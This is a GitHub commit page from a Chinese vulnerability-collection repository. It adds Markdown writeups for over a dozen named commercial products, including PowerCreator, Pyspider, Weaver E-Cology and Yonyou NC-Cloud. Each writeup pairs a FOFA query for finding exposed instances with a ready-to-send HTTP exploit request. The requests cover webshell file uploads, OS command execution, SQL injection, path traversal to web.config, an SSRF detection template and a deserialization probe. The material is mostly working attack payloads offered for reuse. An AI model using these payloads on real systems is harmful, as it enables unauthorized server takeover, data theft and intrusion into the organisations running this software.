Skip to content

Commit

Permalink
7.12更新漏洞
Browse files Browse the repository at this point in the history
  • Loading branch information
wy876 committed Jul 12, 2024
1 parent c8b3f32 commit 33aeb58
Show file tree
Hide file tree
Showing 16 changed files with 454 additions and 2 deletions.
Original file line number Diff line number Diff line change
@@ -0,0 +1,37 @@
## PowerCreator接口UploadResourcePic.ashx存在任意文件上传漏洞

PowerCreator接口 UploadResourcePic.ashx存在任意文件上传漏洞。攻击者可利用该漏洞上传webshell,获得服务器权限。

## fofa

```yaml
app="PowerCreator-CMS"
```

![image-20240711194543726](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111945851.png)

## poc

```yaml
POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1517.3.1 Ddg/17.3.1
Connection: close
Content-Length: 246
Content-Disposition: form-data;name="file1";filename="poc.aspx";
Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136
Accept-Encoding: gzip, deflate

-----------------------------20873900192357278038549710136
Content-Disposition: form-data; name="file1"; filename="111.aspx"
Content-Type: image/jpeg

11111
-----------------------------20873900192357278038549710136--
```

![image-20240711194442981](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111944029.png)

文件路径 `http://127.0.0.1/ResourcePic/ODM4Mg==.ASPX`

![image-20240711194519399](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111945443.png)
26 changes: 26 additions & 0 deletions Pyspider-WebUI未授权访问致远程代码执行漏洞.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
## Pyspider-WebUI未授权访问致远程代码执行漏洞

由于Pyspider WebUI未进行合理的访问控制,默认允许远程攻击者未授权访问webui界面,且系统内部存在python脚本在线编辑并运行的模块,导致未经身份验证的攻击者可远程执行python代码调用系统命令来获取服务器权限。

## fofa

```yaml
title="Dashboard - pyspider"
```

## poc

```yaml
POST /debug/任意实例名/run HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Connection: close

webdav_mode=false&script=import+os%0D%0A%0D%0Aprint%28os.system%28%27执行的命令%27%29%29&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D
```

![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407092258892.png)
16 changes: 16 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,6 +1,22 @@
# 漏洞收集
收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了700多个poc/exp,善用CTRL+F搜索

## 2024.07.12 新增漏洞

- 泛微E-Cology接口getFileViewUrl存在SSRF漏洞
- Pyspider-WebUI未授权访问致远程代码执行漏洞
- 赛蓝企业管理系统DownloadBuilder任意文件读取漏洞
- 上讯信息技术股份有限公司运维管理系统RepeatSend存在命令执行漏洞
- 同享人力管理管理平台DownloadFile存在任意文件下载漏洞
- 北京中科聚网一体化运营平台importVisualModuleImg接口存在文件上传漏洞
- 用友NC-Cloud接口blobRefClassSea存在反序列化漏洞
- 慧学教育科技有限公司Campuswit_uploadFiles存在任意文件上传漏洞
- 虚拟仿真实验室系统FileUploadServlet存在任意文件上传漏洞
- 风速科技统一认证平台存在密码重置漏洞
- 联奕统一身份认证平台getDataSource存在信息泄露漏洞
- PowerCreator接口UploadResourcePic.ashx存在任意文件上传漏洞
- 数字通OA-智慧政务接口payslip存在SQL注入漏洞

## 2024.07.09 新增漏洞

- 申瓯通信在线录音管理系统Thinkphp远程代码执行漏洞
Expand Down
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
## 上讯信息技术股份有限公司运维管理系统RepeatSend存在命令执行漏洞

上海上讯信息技术股份有限公司运维管理系统 `/emailapply/RepeatSend`存在命令执行漏洞,获取服务器权限。

## fofa

```
body="default/getloginhtml"
```

## poc

```yaml
POST /emailapply/RepeatSend HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.850.86 Safari/537.36

id='%0aping dnslog.cn%0a'
```

Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,7 @@
## fofa

```
body="/him/api/rest/v1.0/node/role
body="/him/api/rest/v1.0/node/role"
```

## poc
Expand Down
Original file line number Diff line number Diff line change
@@ -0,0 +1,37 @@
## **北京中科聚网一体化运营平台importVisualModuleImg接口存在文件上传漏洞**

北京中科聚网信息技术有限公司的一体化运营平台是一个综合性的信息系统,旨在为企业或机构提供全方位的运营支持和管理服务。北京中科聚网信息技术有限公司一体化运营平台importVisualModuleImg接口存在文件上传漏洞,攻击者可利用此漏洞上传任意文件获取服务器权限。

## fofa

```yaml
title="一体化运营平台" || body="thirdparty/ueditor/WordPaster"
```

## poc

```yaml
POST /manage/tplresource/importVisualModuleImg?moduleId=2 HTTP/1.1
Host:
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----9979a3f1-cdb1-43af-af88-a9b48b67cf71
Content-Length: 198
Cookie: JSESSIONID=9438c497-92ad-4800-b821-20602adec4ac; rememberMe=dcOzuzCzFrtr02GhN9IwcsR9v759kvzO9wq/upEQ0jwsU5y/25kFW52CaKmZoRP7pwH979ifBBXB3b+li3PSXwZmxnh+bMgi6kv5vv8WNkNdy1pblj7sPxtwIm71auJPyyOl+aMKAhk/71leMQLpneRk/8f6USYL/acFuWhpjyuVU6oP6YJdIoCKGgdxAiUk;

------9979a3f1-cdb1-43af-af88-a9b48b67cf71
Content-Disposition: form-data; name="file"; filename="tmp.jsp"
Content-Type: multipart/form-data

6666
------9979a3f1-cdb1-43af-af88-a9b48b67cf71--
```

![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407101850568.png)



Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
## **同享人力管理管理平台DownloadFile存在任意文件下载漏洞**

同享软件成立于1997年,运营中心位于东莞南城南新产业国际。专注研发和推广人力资源信息化产品,帮助企业构建统一的人力资源数智化平台,快速提高企业人才管理能力,提升人力资源管理效率,帮助员工快速成长,协助企业实现智慧决策。同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞

## fofa

```yaml
body="/Assistant/Default.aspx"
```

## poc

```yaml
POST /Service/DownloadTemplate.asmx HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: ASP.NET_SessionId=f40br0ilcoosnxgllqrmltkd
Upgrade-Insecure-Requests: 1
Priority: u=1
SOAPAction: http://tempuri.org/DownloadFile
Content-Type: text/xml;charset=UTF-8
Host:
Content-Length: 310

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:DownloadFile>
<!--type: string-->
<tem:path>../web.config</tem:path>
</tem:DownloadFile>
</soapenv:Body>
</soapenv:Envelope>
```

![image-20240710184711192](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407101847260.png)
Original file line number Diff line number Diff line change
@@ -0,0 +1,42 @@
## **慧学教育科技有限公司Campuswit_uploadFiles存在任意文件上传漏洞**

慧学教育科技有限公司Campuswit uploadFiles存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。

## fofa

```yaml
body="campuswit"
```

## poc

```yaml
POST /v1/public/uploadFiles HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 412

--00content0boundary00
Content-Disposition: form-data; name="keep_filename"

1
--00content0boundary00
Content-Disposition: form-data; name="check_file"

1
--00content0boundary00
Content-Disposition: form-data; name="campuswitHash"

campuswit_hash_success
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: text/php

1234
--00content0boundary00--
```

![image-20240711184311236](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111843311.png)
25 changes: 25 additions & 0 deletions 数字通OA-智慧政务接口payslip存在SQL注入漏洞.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
## 数字通OA-智慧政务接口payslip存在SQL注入漏洞

中科数字通(北京)科技有限公司全新架构的智慧办公系统,由9大类、50多个主要功能模块构成。旨在为组织单位内部提供全新一代智慧型协同办公系统,数字通指尖云平台-智慧政务存在SQL注入漏洞,可通过SQL注入可获取敏感信息。

## fofa

```yaml
暂无语法
```

## poc

```yaml
GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: GOASESSID=i589f58naalabocmbidup7edl3
Upgrade-Insecure-Requests: 1
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407111952197.png)
Original file line number Diff line number Diff line change
Expand Up @@ -29,7 +29,6 @@ Upgrade-Insecure-Requests: 1
<pub:savePic soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<filepath xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">zkimvsrr.jsp</filepath>
<bytes xsi:type="soapenc:base64Binary" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">PCUgb3V0LnByaW50bG4oMTExKjExMSk7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPg==</bytes>
</pub:savePic>
</soapenv:Body>
</soapenv:Envelope>
Expand Down
68 changes: 68 additions & 0 deletions 泛微E-Cology接口getFileViewUrl存在SSRF漏洞.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,68 @@
# 泛微E-Cology接口getFileViewUrl存在SSRF漏洞

泛微E-Cology getFileViewUrl 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。

## fofa

```yaml
app="泛微-OA(e-cology)"
```

## poc

```yaml
POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Upgrade-Insecure-Requests: 1

{
"file_id": "1000",
"file_name": "c",
"download_url":"http://euixlkewfg.dgrh3.cn"
}
```

![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407092255733.png)

## afrog poc

```yaml
id: 泛微E-Cology接口getFileViewUrl存在SSRF漏洞

info:
name: 泛微E-Cology接口getFileViewUrl存在SSRF漏洞
author: wy876
severity: high
verified: true
description: |-
泛微E-Cology getFileViewUrl 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。
Fofa: app="泛微-OA(e-cology)"
reference:
- https://blog.csdn.net/qq_41904294/article/details/140301289
tags: 泛微,ssrf
created: 2024/07/10

set:
oob: oob()
oobHTTP: oob.HTTP
oobDNS: oob.DNS

rules:
r0:
request:
method: POST
path: /api/doc/mobile/fileview/getFileViewUrl
headers:
Content-Type: application/json
body: |
{"file_id": "1000","file_name": "c","download_url":"{{oobHTTP}}"}
expression: response.status == 200 && oobCheck(oob, oob.ProtocolHTTP, 3)

expression: r0()
```
26 changes: 26 additions & 0 deletions 用友NC-Cloud接口blobRefClassSea存在反序列化漏洞.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,26 @@
## 用友NC-Cloud接口blobRefClassSea存在反序列化漏洞

用友NC Cloud接口 /ncchr/pm/ref/indiIssued/blobRefClassSearch 存在反序列漏洞。

## fofa

```yaml
app="用友-NC-Cloud"
```

## poc

```yaml
POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1
Content-Type: application/json
Host:
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

{"clientParam":"{\"x\":{\"@type\":\"java.net.InetSocketAddress\"{\"address\":,\"val\":\"DNSLOG.COM\"}}}"}
```

Loading

0 comments on commit 33aeb58

Please sign in to comment.